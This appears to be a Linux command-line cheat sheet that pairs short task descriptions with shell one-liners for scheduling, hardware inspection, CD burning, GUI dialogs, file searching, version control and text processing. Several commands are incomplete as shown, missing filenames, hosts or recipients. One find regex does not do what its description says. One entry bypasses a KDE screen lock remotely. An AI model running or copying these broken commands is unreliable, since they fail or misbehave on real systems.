
Run a command only when load average is below a certain threshold

 echo "rm -rf /unwanted-but-large/folder" | batch

Cron ‹↑›

Cron is the traditional unix tool for scheduling tasks; that is, for instructing the computer to automatically carry out a task at a given time, or at given intervals, without the user explicitly starting the task. Each task is placed in the 'crontab' file.
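
Each line of the crontab file gives five time fields (minute, hour, day of month, month, day of week) followed by the command; a sketch, with a hypothetical script path:

```
# min hour day-of-month month day-of-week  command
# run a backup script at 3:30am every Sunday (0 = Sunday)
30 3 * * 0 /usr/local/bin/backup.sh
```

An asterisk matches every value of its field.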

view the help page for the crontab file

 man 5 crontab

run the script '' every 15 minutes

 */15 * * * * /usr/local/bin/  put this in the cron file

add the new entry in the file 'crontab' to the cron schedule

 crontab crontab

update your system every day at lunch time (12:00)

 (crontab -e) 00 12 * * * apt-get update (/etc/init.d/cron restart)

edit the crontab file

 crontab -e

edit crontab

 vi ~/.crontab && crontab ~/.crontab

Log output from a cronjob to a file, but also e-mail it if the output contains a string such as 'ERROR'

 your-command 2>&1 | tee -a output.log | grep -C 1000 ERROR

print crontab entries for all the users that actually have a file

 for USER in `cut -d ":" -f1 </etc/passwd`; do crontab -u ${USER} -l 1>/dev/null 2>&1; if [ ! ${?} -ne 0 ]; then echo -en "--- crontab for ${USER} ---\n$(crontab -u ${USER} -l)\n"; fi; done

Notifications ‹↑›

Set an alarm to wake up [2]

 echo "aplay path/to/song" | at [time]

Set an alarm to wake up

 sleep 5h && rhythmbox path/to/song

beep when a server goes offline

 while true; do [ "$(ping -c1 -W1 -w1 | awk '/received/ {print $4}')" != 1 ] && beep; sleep 1; done

Remind yourself to leave in 15 minutes

 leave +15

An alarm clock using xmms2 and at

 echo "xmms2 play" | at 6:00

Send pop-up notifications on Gnome

 notify-send ["<title>"] "<body>"

Email when all rsync processes have finished

 ( while [ -n "$(pgrep rsync)" ]; do sleep 5; done; echo "rsync done" | mailx ) > /dev/null &

Run a long job and notify me when it's finished

 ./ && notify-send "Job finished"

Set audible alarm when an IP address comes online

 ping -i 60 -a IP_address

Notify me when users log in

 notifyme -C `cat /etc/passwd | cut -d: -f1`

display a (gtk) window with the text 'command finished'

 zenity --info --text="command finished!"

Alarms ‹↑›

A snooze button for xmms2 alarm clock

 xmms2 pause && echo "xmms2 play" | at now +5min

An alarm clock using xmms2 and at

 at 6:00 <<< "xmms2 play"

batch - run commands when the system load permits
cron - a scheduling tool
crontab - a file of scheduled tasks
at - run a command at a certain time
nice - run with a certain priority

see the book: ''

Databases ‹↑›

popular database software
postgresql - an advanced open-source SQL database server
mysql - a popular open-source SQL database server
berkeley db - an embedded database library

Get contents from hosts, passwd, groups

 getent [group|hosts|networks|passwd|protocols|services] [keyword]

Configuring Linux ‹↑›

set the default pager used for man pages

 update-alternatives --set pager /usr/bin/most

Environment variables etc

show the current path

 echo $PATH

The Operating System ‹↑›

Find distro name and/or version/release

 cat /etc/*-release

When was your OS installed?

 ls -lct /etc/ | tail -1 | awk '{print $6, $7, $8}'

Kernel ‹↑›

send kernel log (dmesg) notifications to root via cron

 (crontab -l; echo '* * * * * dmesg -c'; ) | crontab -

Short Information about loaded kernel modules

 awk '{print $1}' "/proc/modules" | xargs modinfo | awk '/^(filename|desc|depends)/'

Short Information about loaded kernel modules

 modinfo $(cut -d' ' -f1 /proc/modules) | sed '/^dep/s/$/\n/; /^file\|^desc\|^dep/!d'

find your release version of your ubuntu / debian distro

 lsb_release -a

When was your OS installed?

 ls -ldct /lost+found |awk '{print $6, $7}'

Modules ‹↑›

Modules in some cases serve the purpose of device drivers. In some cases they need to be compiled from source code, and then installed in the kernel with 'modprobe'.

Disable beep sound from your computer

 echo "blacklist pcspkr"|sudo tee -a /etc/modprobe.d/blacklist.conf

Swap Files ‹↑›

create an emergency swapfile when the existing swap space is too small

 sudo dd if=/dev/zero of=/swapfile bs=1024 count=1024000;sudo mkswap /swapfile; sudo swapon /swapfile

Hardware Configuration ‹↑›

set your ssd disk as a non-rotating medium

 echo 0 | sudo tee /sys/block/sdb/queue/rotational   'sudo echo 0 >' fails: the redirection is not run as root

32 bits or 64 bits?

 getconf LONG_BIT

Getting information about model no. of computer

 dmidecode | grep -i prod

print indepth hardware info

 sudo dmidecode | more

Generate the CPU utilization report

 sar -u 2 5

hard disk information - Model/serial no.

 hdparm -i[I] /dev/sda

Create an html page of information about your harddisk

 lshw -C disk -html > /tmp/diskinfo.html

Create a nifty html overview of the hardware in your computer

 lshw -html > hardware.html  'hardware.html' can be viewed in a browser

show the linux kernel version

 uname -r

show kernel startup messages

 dmesg | less

show usb devices

 lsusb

Modules And Device Drivers ‹↑›

In Linux, 'device drivers' (which make bits of hardware work) are also known as 'kernel modules'. If a piece of hardware is not working, a kernel module usually has to be loaded. This may involve finding the product code for the device (it looks like 0341:4561), finding the module for that product, downloading the module source, compiling it, and installing it.

list your device drivers

 lspci -vv | less

show all loaded kernel modules

 lsmod

find module files in or below the current folder

 find . -name '*.ko'    kernel module files end in '.ko'

build the dependencies between various kernel modules

 depmod -a

load the 'rt3090sta' module (a wireless card driver)

 sudo modprobe rt3090sta

show pci devices

 lspci

show ram memory information

 cat /proc/meminfo

show cpu information

 cat /proc/cpuinfo

Short information about loaded kernel modules

 lsmod | cut -d' ' -f1 | xargs modinfo | egrep '^file|^desc|^dep' | sed -e'/^dep/s/$/\n/g'

Short information about loaded kernel modules

 lsmod | sed -e '1d' -e 's/\(\([^ ]*\) \)\{1\}.*/\2/' | xargs modinfo | sed -e '/^dep/s/$/\n/g' -e '/^file/b' -e '/^desc/b' -e '/^dep/b' -e d

Lists installed kernels

 dpkg --get-selections | grep linux-image

Keyboard ‹↑›

Replace Caps-lock with Control-key

 xmodmap -e 'remove Lock = Caps_Lock' && xmodmap -e 'add control = Caps_Lock'

Change the console keyboard layout

 loadkeys uk

show all key and mouse events

 xev

Monitor ‹↑›

Give information about your graphic chipset

 lshw -C display

Show display adapter, available drivers, and driver in use

 lspci -v | perl -ne '/VGA/../^$/ and /VGA|Kern/ and print'

Devices ‹↑›

Ethernet Card ‹↑›

Get ethernet card information.

 ethtool eth0

Monitors ‹↑›

Configure second monitor to sit to the right of laptop

 xrandr --output LVDS --auto --output VGA --auto --right-of LVDS

Cdroms ‹↑›

Add audio CD to xmms2 playlist

 xmms2 addpls cdda://

Decreasing the cdrom device speed

 eject -x 4

limit the cdrom driver to a specified speed

 eject -x 8 /dev/cdrom

save a compressed copy of data from a cdrom

 gzip < /dev/cdrom > cdrom.iso.gz

rip audio tracks from CD to wav files in current dir

 cdparanoia -B

clear a rewritable compact disk (CDRW)

 cdrecord -v dev=/dev/cdrom blank=fast

Make audio CD from all wavs in current dir (see also cdrdao)

 cdrecord -v dev=/dev/cdrom -audio *.wav

how to copy cd/dvd onto the hard disk (.iso)

 dd if=/dev/cdrom of=whatever.iso

Burning Cds And Dvds ‹↑›

erase content from a cdrw

 cdrecord -v blank=all -force

Create an ISO Image from a folder and burn it to CD

 hdiutil makehybrid -o CDname.iso /Way/to/folder ; hdiutil burn CDname.iso

burn an ISO image to writable CD

 wodim cdimage.iso

burn an iso to cd or dvd

 cdrecord -v path_to_iso_image.iso

add files to existing growable DVD using growisofs

 growisofs -M /dev/dvd -J -r "directory name with files to add to DVD"

Blank/erase a DVD-RW

 dvd+rw-format -force /dev/dvd1

Burn a directory of mp3s to an audio cd.

 alias burnaudiocd='mkdir ./temp && for i in *.[Mm][Pp]3;do mpg123 -w "./temp/${i%%.*}.wav" "$i";done;cdrecord -pad ./temp/* && rm -r ./temp'

backup your playstation game using rip

 cdrdao read-cd --read-raw --datafile FILE_NAME.bin --device /dev/cdrom --driver generic-mmc-raw FILE_NAME.toc

Scsi ‹↑›

Shows physically connected drives (SCSI or SATA)

 ls /sys/bus/scsi/devices

scan for new scsi devices

 echo "- - -" > /sys/class/scsi_host/host0/scan

Usb ‹↑›

remount a usb disk in gnome without physically removing and reinserting

 eject /dev/sdb; sleep 1; eject -t /dev/sdb

Get names of files in /dev, a USB device is attached to

 ls -la /dev/disk/by-id/usb-*

update-alternatives - maintains default programs for tasks
getent - gets data from an administrative database

To relabel a usb thumb drive, first find out the type of file system on the drive.

unmount the usb device before re-labeling it

 sudo umount /dev/sdb1

check the current device label

 sudo mlabel -i /dev/sdb1 -s ::

edit the mtools.conf file

 vim /etc/mtools.conf

relabel the drive

 mlabel p:newlabel

Cpu Central Processing Unit ‹↑›

List the CPU model name

 grep "model name" /proc/cpuinfo

List the CPU model name

 sed -n 's/^model name[ \t]*: *//p' /proc/cpuinfo

packages for relabeling usb thumb drives
FAT16 and FAT32 partitions use mtools.
NTFS partitions use ntfsprogs.
ext2, ext3, or ext4 partitions use e2fsprogs.
JFS partitions use jfsutils.
ReiserFS (v3) partitions use reiserfsprogs.
XFS partitions use xfsprogs.

Xwindows ‹↑›

Start an X app remotely

 ssh -f user@remote.ip DISPLAY=:0.0 smplayer movie.avi

Run any GUI program remotely

 ssh -fX <user>@<host> <program>

Send keypresses to an X application

 xvkbd -xsendevent -text "Hello world"

Click on a GUI window and show its process ID and command used to

 xprop | awk '/PID/ {print $3}' | xargs ps h -o pid,cmd

Start another X session in a window

 startx -- /usr/bin/Xephyr :2

The Clipboard ‹↑›

get xclip to own the clipboard contents

 xclip -o -selection clipboard | xclip -selection clipboard

copy the file list.xml to the clipboard

 cat list.xml | xclip

copy a large file to the clipboard with a progress meter

 pv large.xml | xclip

print to standard output the text or data in the x clipboard

 xsel -o

If a piece of text is currently 'selected' or 'highlighted' in some window on the computer, then this text will be printed with 'xsel -o'

Kde ‹↑›

Kde is an alternative to 'gnome' and uses the qt windowing toolkit. qt is not a completely free toolkit.

Unlock your KDE4.3 session remotely

 qdbus org.kde.screenlocker /MainApplication quit

Gnome ‹↑›

Gnome uses the gtk windowing toolkit to draw its graphical user interfaces. gtk is a completely opensource toolkit.

User Interfaces ‹↑›

Read a keypress without echoing it

 stty cbreak -echo; KEY=$(dd bs=1 count=1 2>/dev/null); stty -cbreak echo

On screen display of command results

 date | osd_cat

Select Menus ‹↑›

The linux 'select' command is the simplest way of making a menu for the user to select from.
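
A minimal sketch of such a menu in bash (the menu entries are made up):

```shell
#!/bin/bash
# present a numbered menu; the chosen word is stored in $fruit,
# and an invalid number leaves $fruit empty
PS3='Choose a fruit: '
select fruit in apple banana quit; do
    case $fruit in
        quit) break ;;
        '')   echo "invalid choice" ;;
        *)    echo "you chose $fruit" ;;
    esac
done
```

The user types the number of an entry, not the entry itself.
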

Whiptail And Dialog ‹↑›

Both whiptail and dialog create 'windows' in a console terminal.

Kdialog ‹↑›

Kdialog seems to be more or less equivalent to zenity for the KDE desktop.

Show a passive popup in KDE which times out in 30 seconds

 kdialog --passivepopup <text> 30

an SSH monitor using kdialog

 ssh root@server 'tail --max-unchanged-stats=10 -n0 -F /var/log/auth.log ' | grep Accepted | while read l ; do kdialog --title "SSH monitor" --passivepopup "$l" 3; done

Zenity ‹↑›

zenity is a simple way to present the user with a graphical user interface without needing to use a programming language. Zenity uses the gtk windowing library, so it is aimed at the GNOME desktop.

Some other zenity examples.

display a window with a calendar and output the chosen date

 zenity --calendar

allow the user to (graphically) choose a file

 zenity --file-selection --title 'select a file'

make a window with a list-box with the files from current folder

 ls | zenity --list --column="test"

try to jump to a folder with zenity

  cd "$(find . -type d -name '*er*' | zenity --list --column=folder)"   'xargs cd' cannot work; cd must run in the current shell

The file which the user selects in the list box is printed to the standard output.

display a text box and a label in a window

 zenity --title "Select Host" --entry --text "Select a server"

display a yes/no box with the question 'really quit now?'

 zenity --question --text "really quit now?"

show a question dialog and exit the script if the user says yes

 zenity --question --text "really quit?" && echo quitting && exit   --question reports the answer via its exit status; it prints nothing

show a notification icon in the gnome task bar

 zenity --notification --window-icon=update.png --text "System update necessary!"

Progress Bars With Zenity ‹↑›

show a progress bar while a command is executing

 find $HOME -name '*.mp3' | zenity --progress --pulsate

Checkboxes With Zenity ‹↑›

display a list with check boxes with the column labels

 zenity --list --checklist --column "Buy" --column "Item" TRUE Apples TRUE Oranges FALSE Pears FALSE Toothpaste

this writes 'Apples|Oranges' to standard out

Windows And Gui Applications ‹↑›

graphical applications which run with the gnome desktop.

open a file with its appropriate window application

 xdg-open file.txt

show the x window for a graphical app running on a remote computer

 ssh -X user@server.ext

Starting X ‹↑›

start X from a virtual console

 startx

run startx and redirect its output to a log file

 startx >$HOME/startx.log 2>&1

start X from a virtual console, and specify 16-bit color depth,

 startx -- -bpp 16

end your X session if you are running the fvwm2 window manager, click the left mouse button in the root window to pull up the start menu, and then choose Really quit? from the Exit Fvwm submenu.

end your X session if you are running the afterstep window manager, click the left mouse button in the root window to pull up the start menu, and then choose Really quit? from the Exit submenu.

exit X immediately

  type [CTRL]-[ALT]-[BACKSPACE]

run a digital clock from a shell window

 xclock -digital &

start a small xclock, 48 pixels wide and 48 pixels high

 xclock -geometry 48x48

start a large xclock, 480 pixels wide and 500 pixels high

 xclock -geometry 480x500

start an xclock with a width of 48 pixels and the default height

 xclock -geometry 48

start an xclock with a height of 48 pixels and the default width

 xclock -geometry x48

list the available colors

 xcolors  Press [Q] to exit xcolors.

switch to the desktop to the left of the current one while running fvw2,

  type [ALT]-[left-arrow]

switch to the desktop directly to the left of the current one while running afterstep,

  type [CTRL]-[left-arrow]

switch to the next-lowest video mode

  type [CTRL]-[ALT]-[keypad minus]

switch to the next-highest video mode

  type [CTRL]-[ALT]-[keypad plus]

change the root window color to blue violet

 xsetroot -solid blueviolet

tile the root window with a star pattern

 xsetroot -bitmap /usr/X11R6/include/bitmaps/star

tile the root window with a light slate gray star pattern on a black background

 xsetroot -fg slategray2 -bg black -bitmap /usr/X11R6/include/bitmaps/star

make the root window a gray color with no pattern

 xsetroot -gray

browse the system documentation files in the '/usr/doc' directory

 lynx /usr/doc

browse the system documentation files in the '/usr/doc' directory in Mozilla: type file:///usr/doc in Mozilla's Location window

find all files on the system that have 'audio' anywhere in their name

 locate audio

find all the files on the system whose file names end with the text 'ogg'

 locate '*ogg'

find all hidden "dotfiles" on the system

 locate /.

NOTE: locate searches are case sensitive; use 'locate -i' for case-insensitive searches.

list all files on the system whose file name is 'top', regardless of case

 find / -iname top

list all files whose names begin with the three characters 'top' followed by exactly three more characters

 find / -name 'top???'

list all files in the current directory tree whose names have either the string 'net' or `comm' anywhere in their file names, type:

 find . -regex '.*\(net\|comm\).*'

list all files in the '/usr/local' directory tree that are greater than 10,000 kilobytes in size

 find /usr/local -size +10000k

list all files in your home directory tree less than 300 bytes in size

 find ~ -size -300b

list all files on the system whose size is exactly 42 512-byte blocks

 find / -size 42

find all empty files in your home directory tree

 find ~ -empty

list the files in the '/usr/local' directory tree that were modified exactly 24 hours ago

 find /usr/local -mtime 1

list the files in the '/usr' directory tree that were modified exactly five minutes ago

 find /usr -mmin 5

list the files in the '/usr/local' directory tree that were modified within the past 24 hours

 find /usr/local -mtime -1

list the files in the '/usr' directory tree that were modified within the past five minutes

 find /usr -mmin -5

list all of the files in your home directory tree that were modified yesterday

 find ~ -daystart -mtime 1

list all of the files in the '/usr' directory tree that were modified one year or longer ago

 find /usr -daystart -mtime +365

list all of the files in your home directory tree that were modified from two to four days ago

 find ~ -daystart -mtime +1 -mtime -5

find files in the '/etc' directory tree that are newer than the file '/etc/motd'

 find /etc -newer /etc/motd

list all files in your home directory tree that were modified after May 4 of the current year

 touch -t 05040000 /tmp/timestamp
 find ~ -newer /tmp/timestamp

list all files in the '/usr/local/fonts' directory tree owned by the user warwick

 find /usr/local/fonts -user warwick

list all files in the '/dev' directory tree owned by the audio group

 find /dev -group audio

find all files in the '~/html/' directory tree with an `.html' extension, and output lines from these files that contain the string 'organic'

 find ~/html/ -name '*.html' -exec grep organic '{}' ';'

remove files from your home directory tree that were accessed more than one year after they were last modified, pausing to confirm before each removal

 find ~ -used +365 -ok rm '{}' ';'

list files in your home directory tree whose names begin with the string 'top', and that are newer than the file `/etc/motd', type:

 find ~ -name 'top*' -newer /etc/motd

compress all the files in your home directory tree that are two megabytes or larger, and that are not already compressed with gzip (having a '.gz' file name extension)

 find ~ -size +2000000c -regex '.*[^gz]' -exec gzip '{}' ';'

list the files in the current directory, with their attributes, sorted with the largest files first

 ls -lS

list the files in the current directory and their attributes, sorted from smallest to largest

 ls -lSr

output a list of the subdirectories of the current directory tree, sorted in ascending order by size

 du -S . | sort -n

output a list of the subdirectories in the current directory tree, sorted in descending order by size

 du -S . | sort -nr

output a list of the subdirectories in the '/usr/local' directory tree, sorted in descending order by size

 du -S /usr/local | sort -nr

output the number of files in the current directory

 ls | wc -l

count the number of files -- including dot files -- in the current directory

 ls -A | wc -l

list the number of files in the '/usr/share' directory tree, type:

 find /usr/share \! -type d | wc -l

list the number of files and directories in the '/usr/share' directory tree

 find /usr/share | wc -l

list the number of directories in the '/usr/share' directory tree

 find /usr/share \! -type f | wc -l

find out whether perl is installed on your system, and, if so, where it resides

 which perl  prints something like '/usr/bin/perl'

determine the format of the file '/usr/doc/HOWTO/README.gz'

 file /usr/doc/HOWTO/README.gz
/usr/doc/HOWTO/README.gz: gzip compressed data, deflated, original

determine the compression format of the file '/usr/doc/HOWTO/README.gz'

 file -z /usr/doc/HOWTO/README.gz

File Timestamps ‹↑›

change the timestamp of file 'pizzicato' to the current date and time

 touch pizzicato

change the timestamp of file 'pizzicato' to '17 May 1999 14:16'

 touch -d '17 May 1999 14:16' pizzicato

change the timestamp of file 'phone' to '14:16'

 touch -d '14:16' phone

split 'large.mp3' into separate files of one megabyte each, whose names begin with 'large.mp3.'

 split -b1m large.mp3 large.mp3.

reconstruct the original file from the split files

 cat large.mp3.* > large.mp3
 rm large.mp3.*
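
The round trip can be verified with cmp on a throwaway file (the file names are made up):

```shell
# split a 3000-byte file into 1-kilobyte pieces, rejoin them,
# and check that the copy is byte-for-byte identical
cd "$(mktemp -d)"
head -c 3000 /dev/urandom > big.bin
split -b 1k big.bin big.bin.
cat big.bin.* > rejoined.bin
cmp big.bin rejoined.bin && echo identical
```
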

determine whether the files 'master' and `backup' differ

 cmp master backup

Version Control Systems ‹↑›

A version or revision control system is designed to keep track of different versions of a text document, or other file or files. These systems are often employed when writers or programmers want to be able to revert to a previous version of a document or code file.
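
As a small taste of how such a system works, a throwaway repository with the modern 'git' tool (the file name and commit messages are made up):

```shell
# create a scratch repository, record two revisions, and list the history
cd "$(mktemp -d)"
git init -q .
git config user.email 'you@example.com'
git config user.name 'you'
echo 'first draft'  > novel.txt
git add novel.txt
git commit -q -m 'check in the first draft'
echo 'second draft' > novel.txt
git commit -q -a -m 'revise the draft'
git log --pretty=oneline
```

Each commit records a snapshot that can later be compared against or reverted to.
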

Cvs ‹↑›

Override and update your locally modified files through cvs..

 cvs update -C

List only locally modified files with CVS

 cvs -Q status | grep -i locally

Subversion ‹↑›

Subversion is a reasonably modern versioning system which was supposed to replace 'cvs'.

Prints total line count contribution per user for an SVN

 svn ls -R | egrep -v -e "\/$" | xargs svn blame | awk '{print $2}' | sort | uniq -c | sort -r

Add new files/directory to subversion repository

 svn status | grep '^\?' | sed -e 's/^\?//g' | xargs svn add

Skip over .svn directories when using the "find" command.

 find . -not \( -name .svn -prune \)

Archive all SVN repositories in a platform independent form

 find repMainPath -maxdepth 1 -mindepth 1 -type d | while read dir; do echo processing $dir; sudo svnadmin dump --deltas $dir >dumpPath/`basename $dir`; done

Ignore a directory in SVN, permanently

 svn propset svn:ignore "*" tool/templates_c; svn commit -m "Ignoring tool/templates_c"

Add all files in current directory to SVN

 svn add --force *

Get a range of SVN revisions from svn diff and tar gz them

 tar cvfz changes.tar.gz --exclude-vcs `svn diff -rM:N --summarize . | grep . | awk '{print $2}' | grep -E -v '^\.$'`

get colorful side-by-side diffs of files in svn with vim

 vimdiff <(svn cat "$1") "$1"

sync svn working copy and remote repository (auto adding new

 svn status | grep '^?' | awk '{ print $2; }' | xargs svn add

Commit only newly added files to subversion repository

 svn ci `svn stat |awk '/^A/{printf $2" "}'`

Add all unversioned files to svn

 svn st | grep "^\?" | awk "{print \$2}" | xargs svn add $1

Add all files not under subversion control

 for i in $(svn st | grep "?" | awk '{print $2}'); do svn add $i; done;

Deleting Files from svn which are missing

 svn status | grep '!' | sed 's/!/ /' | xargs svn del --force

Have subversion ignore a file pattern in a directory

 svn propset svn:ignore "*txt" log/

output list of modifications for an svn revision

 svn log $url -r $revision -v | egrep " [RAMD] \/" | sed s/^.....//

Recursively Add Changed Files to Subversion

 svn status | grep "^\?" | awk '{print $2}' | xargs svn add

Output a list of svn repository entities to xml file

 svn list -R --xml >> svnxxmlinfo.xml

fetch all revisions of a specific file in an SVN repository

 svn log fileName|cut -d" " -f 1|grep -e "^r[0-9]\{1,\}$"|awk {'sub(/^r/,"",$1);print "svn cat fileName@"$1" > /tmp/fileName.r"$1'}|sh

Create subversion undo point

 function svnundopoint() { if [ -d .undo ]; then r=`svn info | grep Revision | cut -f 2 -d ' '` && t=`date +%F_%T` && f=${t}rev${r} && svn diff>.undo/$f && svn stat>.undo/stat_$f; else echo Missing .undo directory; fi }

gets all files committed to svn by a particular user since a given date

wmctrl - control a window manager from scripts

Git ‹↑›

This system is used for linux kernel development and was written by Linus Torvalds himself after dissatisfaction with other tools.

Add forgotten changes to the last git commit

 git commit --amend

Move all files untracked by git into a directory

 git clean -n | sed 's/Would remove //; /Would not remove/d;' | xargs mv -t stuff/

Show git branches by date - useful for showing active branches

 for k in `git branch|sed s/^..//`;do echo -e `git log -1 --pretty=format:"%Cgreen%ci %Cblue%cr%Creset" "$k"`\\t"$k";done|sort

List all authors of a particular git project

 git shortlog -s | cut -c8-

grep across a git repo and open matching files in gedit

 git grep -l "your grep string" | xargs gedit

Show (only) list of files changed by commit

 git show --relative --pretty=format:'' --name-only HASH

git remove files which have been deleted

 git add -u

Prints per-line contribution per author for a GIT repository

 git ls-files | xargs -n1 -d'\n' -i git blame {} | perl -n -e '/\s\((.*?)\s[0-9]{4}/ && print "$1\n"' | sort -f | uniq -c -w3 | sort -r

github push-ing behind draconian proxies!

 git remote add origin git@SSH-HOST:<USER>/<REPOSITORY>.git

Display summary of git commit ids and messages for a given branch

 git log --pretty='format:%Cgreen%H %Cred%ai %Creset- %s'

Makes a project directory (unless it exists), changes into it, and initializes a git repository

 gitstart () { if ! [[ -d "$@" ]]; then mkdir -p "$@" && cd "$@" && git init; else cd "$@" && git init; fi }

Display summary of git commit ids and messages for a given branch

 git log master | awk '/commit/ {id=$2} /\s+\w+/ {print id, $0}'

Display condensed log of changes to current git repository

 git log --pretty=oneline

Undo several commits by committing an inverse patch.

 git diff HEAD..rev | git apply --index; git commit

Stage only portions of the changes to a file.

 git add --patch <filename>

Rcs An Old Version Control System ‹↑›

check in the file 'novel' with RCS

 ci novel

deposit this revision in RCS

 ci novel

check out the latest revision of the file 'novel' for editing,

 co -l novel

check out the current revision of file 'novel', but dont permit any changes

 co novel

check out revision 1.14 of file 'novel'

 co -l -r1.14 novel   check in the latest changes first

view the revision log for file 'novel'

 rlog novel

Reading Text Files ‹↑›

page through the text file 'README'

 less README

page through all of the Unix FAQ files in '/usr/doc/FAQ'

 less /usr/doc/FAQ/unix-faq-part*
This command starts less, opens in it all of the files that match the given pattern '/usr/doc/FAQ/unix-faq-part*', and begins displaying the first one.

peruse the file 'translation' with non-printing characters displayed

 cat -v translation | less  non-printing characters are shown with 'hats'

output the first ten lines of file 'placement-list'

 head placement-list

output the first line of file 'placement-list'

 head -1 placement-list

output the first sixty-six lines of file 'placement-list'

 head -66 placement-list

output the first character in the file 'placement-list'

 head -c1 placement-list

output the last ten lines of file 'placement-list'

 tail placement-list

output the last fourteen lines of file 'placement-list'

 tail -14 placement-list

follow the end of the file 'access_log'

 tail -f access_log

output line 47 of file 'placement-list'

 sed '47!d' placement-list

output lines 47 to 108 of file 'placement-list'

 sed '47,108!d' placement-list

output the tenth line in the file 'placement-list'

 head placement-list | tail -1

output the fifth and fourth lines from the bottom of file 'placement-list'

 tail -5 placement-list | head -2

output the 500th character in 'placement-list'

 head -c500 placement-list | tail -c1

output the first character on the fifth line of the file 'placement-list'

 head -5 placement-list | tail -1 | head -c1

output all the text from file 'book-draft' between `Chapter 3' and 'Chapter 4'

 sed -n '/Chapter 3/,/Chapter 4/p' book-draft

output all the text from file 'book-draft', except that which lies between the text 'Chapter 3' and `Chapter 4'

 sed '/Chapter 3/,/Chapter 4/d' book-draft
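
The behaviour of a range address is easy to check on a small sample: '-n' with 'p' prints only the range, while 'd' deletes it and keeps the rest:

```shell
# print only the lines between the two markers (inclusive)
printf 'one\nChapter 3\ntwo\nChapter 4\nthree\n' | sed -n '/Chapter 3/,/Chapter 4/p'
# delete the range instead, keeping everything outside it
printf 'one\nChapter 3\ntwo\nChapter 4\nthree\n' | sed '/Chapter 3/,/Chapter 4/d'
```
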

apply the kraut filter to the text in the file '/etc/motd'

 cat /etc/motd | kraut

view the contents of the text file 'alice-springs' in sview

 sview alice-springs

view an ASCII character set

 man ascii

view the ISO 8859-1 character set

 man iso_8859_1

run the vi tutorial, type the following from your home directory:

 cp /usr/doc/nvi/vi.beginner.gz .
 gunzip vi.beginner

concatenate these files into a new file, 'novels'

 cat early later > novels

make a file, 'novels', with some text in it

 cat > novels
This Side of Paradise
The Beautiful and Damned
...

add a line of text to the bottom of file 'novels'

 cat >> novels
The Last Tycoon
then type [CTRL]-[D] to end the file

insert several lines of text at the beginning of the file 'novels'

 ins novels
The Novels of F. Scott Fitzgerald

process the file and write to the file 'monday.txt'

 m4 menu > monday.txt

Debian: 'an'

output all anagrams of the word 'lake'

 an lake

output all anagrams of the phrase 'lakes and oceans'

 an 'lakes and oceans'

output only anagrams of the phrase 'lakes and oceans' which contain the string 'seas'

 an -c seas 'lakes and oceans'

output all of the words that can be made from the letters of the word 'seas'

 an -w seas

output all of the palindromes in the system dictionary

 perl -lne 'print if $_ eq reverse' /usr/dict/words

make a cut-up from a file called 'nova'

 cutup nova

Debian: 'dadadodo'

output random text based on the text in the file 'nova'

 dadadodo nova

output all non-empty lines from the file 'term-paper'

 grep . term-paper

output only the lines from the file 'term-paper' that contain more than just space characters

 grep '[^ ].' term-paper

output only the odd lines from file 'term-paper'

 sed 'n;d' term-paper
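
A quick check of the odd-line filter on numbered input:

```shell
# 'n' auto-prints the current (odd) line and reads the next one,
# which 'd' then deletes
printf '1\n2\n3\n4\n5\n' | sed 'n;d'   # prints 1, 3, 5 (one per line)
```
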

double-space the file 'term-paper' and save to 'term-paper.print'

 pr -d -t term-paper > term-paper.print

triple-space the file 'term-paper' and save to the file 'term-paper.print'

 sed 'G;G' term-paper > term-paper.print

quadruple-space the file 'term-paper', and save to the file 'term-paper.print'

 sed 'G;G;G' term-paper > term-paper.print

output the file 'owners-manual' with a five-space (or five-column) margin to a new file, ''

 pr -t -o 5 -w 77 owners-manual >
This command is almost always used for printing, so the output is usually piped to the printer with lpr.

print the file 'owners-manual' with a 5-column margin and 80 columns of text

 pr -t -o 5 -w 85 owners-manual | lpr

print the file 'owners-manual' with a 5-column margin and 75 columns of text

 pr -t -o 5 -w 80 owners-manual | lpr

convert all tab characters to spaces in 'list', and write the output to 'list2'

 expand list > list2

convert initial tab characters to spaces in 'list', and write the output to the standard output

 expand -i list

convert every 8 leading space characters to tabs in 'list2', saving in 'list'

 unexpand list2 > list

convert all occurrences of eight space characters to tabs in file 'list2', and write the output to the standard output

 unexpand -a list2

convert every leading space character to a tab character in 'list2', and write the output to the standard output

 unexpand -t 1 list2
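
A round trip through both tools can be made visible with cat -A, which shows tabs as '^I':

```shell
# the tab becomes spaces, then 'unexpand -a' turns them back into a tab
printf 'a\tb\n' | expand | cat -A
printf 'a\tb\n' | expand | unexpand -a | cat -A   # prints: a^Ib$
```
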

paginate the file 'listings' and write the output to a file called ''

 pr -f -h "" listings >
By default, pr outputs pages of 66 lines each. You can specify the page length with the '-l' option.

paginate the file 'listings' with 43-line pages, and write the output to a file called ''

 pr -f -h "" -l 43 listings >
NOTE: If a page has more lines than a printer can fit on a physical page, the text will spill over onto an extra page.

print the file 'duchess' with the default pr preparation

 pr duchess | lpr

You can also use pr to put text in columns -- give the number of columns to use as an option.

print the file 'news.update' in four columns with no headers or footers

 pr -4 -t news.update | lpr

replace plaintext-style italics with TeX '\it' commands

 M-x replace-regular-expression _\([^_]+\)_ \{\\it \1}

replace TeX-style italics with plaintext _underscores_

 M-x replace-regular-expression \{\\it \([^\}]+\)\} _\1_

output the file 'term-paper' so that you can view underbars, type:

 ul term-paper

output the file 'term-paper' with all backspace characters stripped out

 col -u term-paper

sort the file 'provinces' and output all lines in ascending order

 sort provinces

sort the file 'provinces' and output all lines in descending order

 sort -r provinces

peruse the file 'report' with each line of the file preceded by line numbers

 nl report | less   set the numbering style with the '-b' option

show 'report', each line preceded by line numbers, starting with 2 step 4

 nl -v 2 -i 4 report

peruse the text file 'report' with each line of the file numbered

 cat -n report | less

peruse the text file 'report' with each non-blank line of the file numbered

 cat -b report | less

write a line-numbered version of file 'report' to file 'report.lines'

 cat -n report > report.lines

output the file 'prizes' in line-for-line reverse order

 tac prizes

output 'prizes' in page-for-page reverse order

 tac -s $'\f' prizes  using the form-feed as the delimiter

output 'prizes' in word-for-word reverse order

 tac -r -s '[^a-zA-Z0-9\-]' prizes

output 'prizes' in character-for-character reverse order

 tac -r -s '.\|
  ' prizes

output 'prizes' with the characters on each line reversed

 rev prizes

output lines in the file 'catalog' containing the word `CD', type:

 grep CD catalog

output lines in the file 'catalog' containing the word `Compact Disc'

 grep 'Compact Disc' catalog

output lines in all files in the current directory containing the word 'CD'

 grep CD *

output lines in the file 'catalog' that contain a `$' character, type:

 grep '\$' catalog

output lines in the file 'catalog' that contain the string '$1.99'

 grep '\$1\.99' catalog

output all lines in '/usr/dict/words' beginning with `pre', type:

 grep '^pre' /usr/dict/words

